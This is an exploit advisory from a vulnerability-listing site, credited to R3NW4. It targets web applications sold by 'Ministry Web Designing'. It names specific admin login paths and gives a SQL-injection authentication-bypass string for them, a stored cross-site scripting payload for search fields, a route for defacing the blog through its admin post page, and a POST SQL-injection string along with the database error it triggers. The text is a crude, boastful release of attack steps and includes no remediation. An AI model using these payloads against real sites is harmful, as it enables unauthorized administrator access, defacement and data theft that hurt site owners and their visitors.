Ministry Web Designing Multiple Vulnerabilities

2015.08.04
Credit: R3NW4
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: [Ministry Web Designing Multiple Vulnerabilities] # Google Dork: [ Not for noobs :D ] # Date: [4-8-2015] # Exploit Author: [R3NW4] # Platform: (WebApps) # Vendor Homepage [http://www.ministrywebdesigning.com/] # Version: [All versions] # Tested on: [Linux(Debian)] # Greetz: MuhmadEmad - Razor X Blade - All Kurdish Hackers # I didn't see any security ----------------------- Multiple Admin Authication bypass Vulnerableties: exploit: user: '=' 'or' pass: '=' 'or' Vunlerable Sections: /downloadcounter/admin/login.php /mediaprogram/admin/index.php /churchprogram/login.php ----------------------- Multiple Stored XSS Vunlerable Sections: /ministryprograms/Blog/ /churchprogram/ShoppingCart/ /churchprogram/phpMonthlyCalendar/admin.php in search field type: "'/>><img src=x onerror=alert(/XSS_HERE/)> ------------------------ Make a Defacment: /ministryprograms/Blog/admin.php?ac=newPost deface goes here: /ministryprograms/Blog/frontend/index.php?ac=post&id=1&p=1 ------------------------ SQLi From POST: /ministryprograms/Blog/frontend/index.php with this data: ac=list&submit=&search_str=%27 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR title LIKE '%'%')' at line 1 ------------------------- # Remember i born in 2000, Fuck Lammers # https://twitter.com/R3NW4

References:

https://twitter.com/R3NW4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top